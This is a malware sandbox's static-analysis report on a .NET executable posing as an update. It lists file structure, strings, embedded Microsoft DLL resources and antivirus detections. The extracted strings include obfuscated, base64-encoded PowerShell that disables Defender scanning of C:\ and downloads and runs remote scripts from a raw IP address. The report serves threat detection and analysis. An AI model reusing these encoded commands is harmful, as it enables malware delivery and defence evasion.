Static | ZeroBOX

PE Compile Time

2102-05-30 00:39:48

PDB Path

C:\Users\xD\source\repos\Update\Update\obj\Release\NKSSD.pdb

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x0000f2a8 0x0000f400 5.42316769753
.rsrc 0x00012000 0x00002ea0 0x00003000 4.88352824718
.reloc 0x00016000 0x0000000c 0x00000200 0.101910425663

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x00013a78 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_ICON 0x00013a78 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_ICON 0x00013a78 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_ICON 0x00013a78 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_ICON 0x00013a78 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_ICON 0x00013a78 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_GROUP_ICON 0x00014930 0x0000005a LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x0001499c 0x00000304 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x00014cb0 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<Module>
mscorlib
Synchronized
defaultInstance
RuntimeTypeHandle
GetTypeFromHandle
set_WindowStyle
ProcessWindowStyle
set_FileName
get_Culture
set_Culture
resourceCulture
ApplicationSettingsBase
Update
EditorBrowsableState
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
NKSSD.exe
System.Runtime.Versioning
System.ComponentModel
Program
System
resourceMan
get_DAConn
System.Configuration
System.Globalization
System.Reflection
CultureInfo
ProcessStartInfo
get_ResourceManager
System.CodeDom.Compiler
.cctor
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
NKSSD.Properties.Resources.resources
DebuggingModes
NKSSD.Properties
Settings
Process
set_Arguments
GetObject
get_Default
set_RedirectStandardOutput
set_CreateNoWindow
get_Assembly
WrapNonExceptionThrows
Update
Copyright
2023
$11547d56-6565-462b-8fe1-1e06bbe811ef
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4A
3System.Resources.Tools.StronglyTypedResourceBuilder
17.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
17.0.3.0
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADPL
!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.didat
@.reloc
WAVAWH
H!|$(E3
H!|$ E3
@A_A^_
UAVAWH
UVWATAUAVAWH
A_A^A]A\_^]
@USVWAVH
A^_^[]
C I!{ E3
UVWAVAWH
0A_A^_^]
~ H9uEH
SVWATAVAWH
8A_A^A\_^[
VWATAVAWH
@A_A^A\_^
SVWAVAWH
0A_A^_^[
SVWATAUAVAWH
@A_A^A]A\_^[
SVWAVAWH
0A_A^_^[
Y@H9;u+L
WAVAWH
9A98u6A9x
0A_A^_
@SUVWH
UATAVH
@USVWAVH
A^_^[]
WAVAWH
A_A^_
ATAVAWH
A_A^A\
LcA<E3
u HcA<H
H3E H3E
E(=csm
E8=csm
EH=csm
EX=csm
Eh=csm
Ex=csm
httpprxp.dll
Kerberos
DirectAccess
;xeI&N
ContinueDirectAccessCfe
DisconnectDirectAccessCfe
ConnectDirectAccessCfe
MicrosoftWindowsShellVanNetworkUx
RSDS$Y
DAConn.pdb
.text$di
.text$mn
.text$mn$00
.text$x
.text$yd
.rdata$brc
.idata$5
.00cfg
.CRT$XCA
.CRT$XCL
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIZ
.gehcont
.gfids
.giats
.rdata
.rdata$r
.rdata$zETW0
.rdata$zETW1
.rdata$zETW2
.rdata$zETW9
.rdata$zzzdbg
.xdata
.xdata$x
ATL$__a
ATL$__m
ATL$__z
.didat$2
.didat$3
.didat$4
.didat$6
.didat$7
.edata
.idata$2
.idata$3
.idata$4
.idata$6
.data$brc
.data$r$brc
.pdata
.didat$5
.rsrc$01
.rsrc$02
ProxyHelperProviderConnectToServer
ProxyHelperGetProxyEventInformation
ProxyHelperProviderSetProxyCredentials
ProxyHelperProviderFreeMemory
ProxyHelperProviderDisconnectFromServer
DAConn.dll
DllCanUnloadNow
DllGetClassObject
__CxxFrameHandler3
_purecall
__C_specific_handler
malloc
memcpy_s
_callnewh
_XcptFilter
_amsg_exit
_initterm
msvcrt.dll
?terminate@@YAXXZ
??1type_info@@UEAA@XZ
_unlock
__dllonexit
_onexit
EtwTraceMessage
RtlInitString
NtAllocateLocallyUniqueId
EtwGetTraceLoggerHandle
EtwGetTraceEnableLevel
EtwGetTraceEnableFlags
EtwRegisterTraceGuidsW
EtwUnregisterTraceGuids
WinSqmAddToStreamEx
WinSqmIncrementDWORD
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
ntdll.dll
GetLastError
CloseHandle
GetCurrentProcess
LockResource
LoadResource
FindResourceExW
DeleteCriticalSection
EnterCriticalSection
LeaveCriticalSection
RaiseException
SizeofResource
InitializeCriticalSection
GetSystemTimeAsFileTime
FormatMessageW
LocalFree
HeapSize
HeapReAlloc
HeapFree
HeapAlloc
GetProcessHeap
HeapDestroy
UnhandledExceptionFilter
SetUnhandledExceptionFilter
TerminateProcess
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetTickCount
KERNEL32.dll
LsaNtStatusToWinError
OpenProcessToken
GetTokenInformation
RegCloseKey
RegCreateKeyExW
RegSetValueExW
EventUnregister
EventRegister
EventSetInformation
RegOpenKeyExW
EventWriteTransfer
RegQueryValueExW
ADVAPI32.dll
CredUIPromptForWindowsCredentialsW
SspiPromptForCredentialsW
credui.dll
CoTaskMemAlloc
CoTaskMemFree
CoCreateInstance
ole32.dll
LsaConnectUntrusted
LsaDeregisterLogonProcess
LsaLookupAuthenticationPackage
LsaLogonUser
LsaFreeReturnBuffer
Secur32.dll
ShellExecuteExW
SHELL32.dll
SHLWAPI.dll
GetPropW
SendMessageW
GetParent
SetPropW
RemovePropW
UnregisterClassA
USER32.dll
?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z
StrToID
?GetCheckedState@TouchCheckBox@DirectUI@@QEAA?AW4CheckedStateFlags@2@XZ
?Click@TouchButton@DirectUI@@SA?AVUID@@XZ
?SetCheckedState@TouchCheckBox@DirectUI@@QEAAJW4CheckedStateFlags@2@@Z
?_ZeroRelease@Value@DirectUI@@AEAAXXZ
?ContentProp@Element@DirectUI@@SAPEBUPropertyInfo@2@XZ
?SetValue@Element@DirectUI@@QEAAJP6APEBUPropertyInfo@2@XZHPEAVValue@2@@Z
?CreateString@Value@DirectUI@@SAPEAV12@PEBGPEAUHINSTANCE__@@@Z
?VisibleProp@Element@DirectUI@@SAPEBUPropertyInfo@2@XZ
?CreateBool@Value@DirectUI@@SAPEAV12@_N@Z
?LayoutPosProp@Element@DirectUI@@SAPEBUPropertyInfo@2@XZ
?CreateInt@Value@DirectUI@@SAPEAV12@HW4DynamicScaleValue@@@Z
DUI70.dll
NcaToggleNamePreferenceState
NcaApi.dll
ResolveDelayLoadedAPI
DelayLoadFailureHook
_CxxThrowException
__RTDynamicCast
memcpy
memset
.?AVCXWizardDUIBaseClass@@
.?AUIElementListener@DirectUI@@
.?AV?$CXWizardPageUIBaseClass@$0GCA@VCDisconnectInfoPage@@$1?CLSID_DisconnectInfoPage@@3U_GUID@@B$0A@$0BPE@$0A@$0A@$0A@$0A@$1?ID_DisconnectInfoPage@@3_JA@@
.?AVCDisconnectInfoPage@@
.?AVCAtlModule@ATL@@
.?AU_ATL_MODULE70@ATL@@
.?AV?$CComContainedObject@VCPreCFEPage@@@ATL@@
.?AV?$CComContainedObject@VCDisconnectInfoPage@@@ATL@@
.?AV?$CAtlDllModuleT@VCDirectAccessConnectionManagerModule@@@ATL@@
.?AU?$CAtlValidateModuleConfiguration@$00VCDirectAccessConnectionManagerModule@@@ATL@@
.?AV?$CAtlModuleT@VCDirectAccessConnectionManagerModule@@@ATL@@
.?AVCDirectAccessConnectionManagerModule@@
.?AV?$CComAggObject@VCDisconnectInfoPage@@@ATL@@
.?AV?$CXWizardPageDUIClass@VCDisconnectInfoPage@@$1?CLSID_DisconnectInfoPage@@3U_GUID@@B$0A@$0BPE@$1?ID_DisconnectInfoPage@@3_JA$0A@@@
.?AV?$CXWizardPageClass@VCDisconnectInfoPage@@$1?CLSID_DisconnectInfoPage@@3U_GUID@@B$0A@@@
.?AUIXWizardPageEvent@@
.?AUIXWizardTransactionEvent@@
.?AVCXWizardClassRoot@@
.?AV?$CComCoClass@VCDisconnectInfoPage@@$1?CLSID_DisconnectInfoPage@@3U_GUID@@B@ATL@@
.?AV?$CComObject@VCDisconnectInfoPage@@@ATL@@
.?AV?$CComObjectRootEx@VCComMultiThreadModelNoCS@ATL@@@ATL@@
.?AV?$CComAggObject@VCPreCFEPage@@@ATL@@
.?AVCPreCFEPage@@
.?AUIAvailableNetworkUiDUIElements@@
.?AV?$CComCoClass@VCPreCFEPage@@$1?CLSID_PreCFEPage@@3U_GUID@@B@ATL@@
.?AV?$CComObject@VCPreCFEPage@@@ATL@@
.?AV?$CComObjectCached@VCComClassFactory@ATL@@@ATL@@
.?AVCComClassFactory@ATL@@
.?AUIClassFactory@@
.?AV?$CComObjectRootEx@VCComMultiThreadModel@ATL@@@ATL@@
.?AVCComObjectRootBase@ATL@@
.?AUIUnknown@@
.?AVCAtlException@ATL@@
<duixml>
<element resid="PreCFEPage"
id="atom(PreCFE)"
sheet="ModernStyle"
layout="borderlayout()"
layoutpos="top"
active="pointer"
margin="rect(0rp,20rp,0rp,0rp)"
accessible="true"
accrole="grouping">
<RichText
id="atom(ProblemText)"
class="ContentText"
layoutpos="top"
active="pointer"
margin="rect(0rp,0rp,0rp,20rp)"
ContentAlign="WrapLeft"
accrole="statictext"
accessible="true"
<touchbutton
id="atom(ConnectButton)"
layoutpos="right"
content="resstr(650)"
accname="resstr(655)"
class="default"
selected="true"
shortcut="auto"
accrole="pushbutton"
accessible="true"
<touchbutton
id="atom(DisconnectButton)"
layoutpos="right"
content="resstr(660)"
accname="resstr(665)"
class="default"
selected="true"
shortcut="auto"
accrole="pushbutton"
accessible="true"
<touchbutton
id="atom(ContinueButton)"
layoutpos="right"
content="resstr(670)"
accname="resstr(675)"
class="default"
selected="true"
shortcut="auto"
accrole="pushbutton"
accessible="true"
</element>
<element resid="Disconnect Info Page"
id="atom(DisconnectInfoPage)"
sheet="ModernStyle"
layout="flowlayout()"
active="pointer"
accessible="true"
width="265rp">
<element
layout="Borderlayout()"
layoutpos="top"
active="pointer"
accessible="true">
<RichText
id="atom(InfoText)"
layoutpos="top"
active="pointer"
contentalign="wrapleft"
padding="rect(0rp,40rp,0rp,0rp)"
accrole="statictext"
accessible="true"
<touchcheckbox
id="atom(HideDisconnectMessageCheckBox)"
content="resstr(603)"
accname="resstr(604)"
shortcut="auto"
margin="rect(0rp,20rp,0rp,0rp)"
accrole="checkbutton"
accessible="true"
</element>
</element>
<stylesheets>
<style resid="ModernStyle" base="ressheet(ImmersiveStyles, library(dui70.dll), Dark)">
<RichText constrainlayout="narrow"/>
<if class="ContentText">
<RichText
foreground="ImmersiveSaturatedSelectionSecondaryText"
</style>
</stylesheets>
</duixml>
C:\Users\xD\source\repos\Update\Update\obj\Release\NKSSD.pdb
_CorExeMain
mscoree.dll
wwwwww
wwwwwx
**"(wz
nnnnnnnh
www
###7777_{
###77777777
###8888777v
###____777
###____87Y
###````87{
###````_7v
###````_7v
###````_7v
]]]]]]V
]]]]]]V
]]]]]]
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
DigiCert Inc1
www.digicert.com1+0)
"DigiCert High Assurance EV Root CA0
061110000000Z
311110000000Z0l1
DigiCert Inc1
www.digicert.com1+0)
"DigiCert High Assurance EV Root CA0
:8P[w1
AA"Nea
DigiCert Inc1
www.digicert.com1+0)
"DigiCert EV Code Signing CA (SHA2)0
180829000000Z
210901120000Z0
Private Organization1
5299537-01421
DigiCert, Inc.1
DigiCert, Inc.0
#g~j>6g
US-UTAH-5299537-01420
1http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
1http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
https://www.digicert.com/CPS0
http://ocsp.digicert.com0H
<http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
]t1*3O
DigiCert Inc1
www.digicert.com1!0
DigiCert Assured ID CA-10
141022000000Z
241022000000Z0G1
DigiCert1%0#
DigiCert Timestamp Responder0
https://www.digicert.com/CPS0
2http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
2http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
http://ocsp.digicert.com0A
5http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
iW!]4/q
DigiCert Inc1
www.digicert.com1+0)
"DigiCert High Assurance EV Root CA0
120418120000Z
270418120000Z0l1
DigiCert Inc1
www.digicert.com1+0)
"DigiCert EV Code Signing CA (SHA2)0
+.+1Xf
http://ocsp.digicert.com0I
=http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
:http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0@
:http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
.http://www.digicert.com/ssl-cps-repository.htm0
DigiCert Inc1
www.digicert.com1$0"
DigiCert Assured ID Root CA0
061110000000Z
211110000000Z0b1
DigiCert Inc1
www.digicert.com1!0
DigiCert Assured ID CA-10
.http://www.digicert.com/ssl-cps-repository.htm0
http://ocsp.digicert.com0C
7http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
4http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
4http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
DigiCert Inc1
www.digicert.com1+0)
"DigiCert EV Code Signing CA (SHA2)
Vv=w0;.
DigiCert Inc1
www.digicert.com1!0
DigiCert Assured ID CA-1
180829205938Z0#
NKSSD.Properties.Resources
DAConn
powershell
-enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA
-enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
-enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
-enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
DAConn
Disconnect Info Page
van.network.guid
HideDisconnectMessageCheckBox
InfoText
_xwizard_this_pointer_
_xwizard_internal_this_pointer_
HideDisconnectMessage
Software\Microsoft\Windows\CurrentVersion\VAN\{7724F5B4-9A4A-4a93-AD09-B06F7AB31035}
PreCFEPage
ConnectButton
DisconnectButton
ContinueButton
ProblemText
WDigest
Kerberos
Negotiate
Proxy Credentials
Microsoft.WindowsFirewall
SOFTWARE\Policies\Microsoft\OTPCredentialProvider
Enabled
%systemroot%\system32\napstat.exe
HideDisconnectMessage
Software\Microsoft\Windows\CurrentVersion\VAN\{7724F5B4-9A4A-4a93-AD09-B06F7AB31035}
UIFILE
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Direct Access Connection Flows
FileVersion
10.0.19041.746 (WinBuild.160101.0800)
InternalName
DAConn.dll
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
DAConn.dll
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.19041.746
VarFileInfo
Translation
UIFILE
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Update
FileVersion
1.0.0.0
InternalName
NKSSD.exe
LegalCopyright
Copyright
2023
LegalTrademarks
OriginalFilename
NKSSD.exe
ProductName
Update
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
RAny use of this Certificate constitutes acceptance of the DigiCert CP/CPS and the Relying Party Agreement which limit liability and are incorporated herein by reference
RAny use of this Certificate constitutes acceptance of the DigiCert CP/CPS and the Relying Party Agreement which limit liability and are incorporated herein by reference
RAny use of this Certificate constitutes acceptance of the DigiCert CP/CPS and the Relying Party Agreement which limit liability and are incorporated herein by reference
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Tedy.335560
ClamAV Clean
FireEye Gen:Variant.Tedy.335560
CAT-QuickHeal Clean
McAfee Artemis!0E4E3CDACFBE
Malwarebytes Spyware.Stealer.MSIL
VIPRE Gen:Variant.Tedy.335560
Sangfor Trojan.Win32.Agent.Vhas
K7AntiVirus Clean
BitDefender Gen:Variant.Tedy.335560
K7GW Clean
Cybereason malicious.588f8f
Baidu Clean
VirIT Clean
Cyren Clean
tehtris Clean
ESET-NOD32 a variant of MSIL/Agent_AGen.AXB
APEX Clean
Paloalto generic.ml
Cynet Clean
Kaspersky UDS:Trojan-Spy.MSIL.Stealer.gen
Alibaba Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Trojan.Agent!8.B1E (CLOUD)
TACHYON Clean
Emsisoft Gen:Variant.Tedy.335560 (B)
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Artemis!Trojan
Trapmine Clean
CMC Clean
Sophos Mal/Generic-S
Ikarus Clean
GData MSIL.Trojan-Downloader.Dunilaber.LDSGOH
Jiangmin Clean
Webroot Clean
Avira Clean
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Tedy.D51EC8
SUPERAntiSpyware Clean
ZoneAlarm UDS:Trojan-Spy.MSIL.Stealer.gen
Microsoft Trojan:Win32/Wacatac.B!ml
Google Clean
AhnLab-V3 Trojan/Win.Generic.C5411648
Acronis Clean
BitDefenderTheta Gen:NN.ZemsilF.36196.fm2@aW7cAAb
ALYac Gen:Variant.Tedy.335560
MAX malware (ai score=86)
DeepInstinct MALICIOUS
VBA32 Clean
Cylance unsafe
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Clean
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet Clean
AVG Win32:DropperX-gen [Drp]
Avast Win32:DropperX-gen [Drp]
CrowdStrike win/malicious_confidence_60% (W)
No IRMA results available.